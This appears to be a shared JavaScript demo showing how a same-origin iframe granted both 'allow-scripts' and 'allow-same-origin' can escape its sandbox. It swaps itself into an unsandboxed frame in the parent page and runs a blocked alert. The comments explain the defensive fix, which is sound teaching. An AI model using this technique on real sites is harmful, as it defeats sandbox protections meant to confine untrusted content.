From sefa, 3 Years ago, written in JavaScript.
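  /*
   * Demo script for the framed "kid" page. It illustrates a documented
   * limitation of the iframe `sandbox` attribute: when the framed document is
   * same-origin with its embedder and the sandbox grants both 'allow-scripts'
   * and 'allow-same-origin', the framed script can reach the embedder's DOM,
   * so the remaining sandbox restrictions (here: the missing 'allow-modals')
   * no longer confine it.
   *
   * Defensive takeaway: never grant both tokens to same-origin content. Serve
   * untrusted content from a separate origin, or leave out 'allow-same-origin'
   * so the frame gets an opaque origin and cannot touch the parent document.
   */

  // The demo only makes sense inside a frame; when opened directly, explain
  // that and stop. `window.self` is used instead of `this`, which is
  // `undefined` at the top level of a module script.
  if (window.top === window.self || window.parent === window.self) {
    const message = "This page is meant to be loaded from within an iframe to demonstrate you can bypass sandbox attribute, when a combination of 'allow-same-origin' and 'allow-scripts' is used.";
    document.body.innerText = message;
    // Throwing aborts the rest of the script.
    throw new Error(message);
  }

  /**
   * Action the original sandbox is expected to block: alert() requires
   * 'allow-modals', which the original iframe did not grant.
   */
  const illegalCode = () => {
    alert("You should not see me, because original iframe did not have 'allow-modals'. Kid page had allow-scripts and same-origin though. A new iframe without sandbox attribute was created - and here I am.");
  };

  /**
   * First load (the sandboxed iframe with id "escapeMe" is still present in
   * the parent): append an iframe without a sandbox attribute that loads this
   * same page, then remove the original frame.
   * Second load (no "escapeMe" element left): run the action the original
   * sandbox would have blocked.
   */
  const escape = () => {
    document.body.innerText = "Loaded into a frame.";

    // Reading parent.document succeeds only because this frame shares the
    // embedder's origin. A cross-origin frame, or one sandboxed without
    // 'allow-same-origin', gets a SecurityError at this point.
    const parentDocument = window.parent.document;
    const container = parentDocument.getElementById("escapeMe");

    if (container === null) {
      // Already running in the replacement frame, which has no sandbox
      // attribute and therefore none of the original restrictions.
      illegalCode();
      return;
    }

    // The replacement is created in the parent's (unsandboxed) document and
    // carries no sandbox attribute of its own.
    const replacement = parentDocument.createElement("iframe");
    replacement.setAttribute("src", "kid.htm");
    replacement.setAttribute("id", "escapedAlready");
    parentDocument.body.append(replacement);

    // Remove the original iframe so the reloaded page takes the other branch
    // instead of looping forever.
    container.remove();
  };

  escape();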
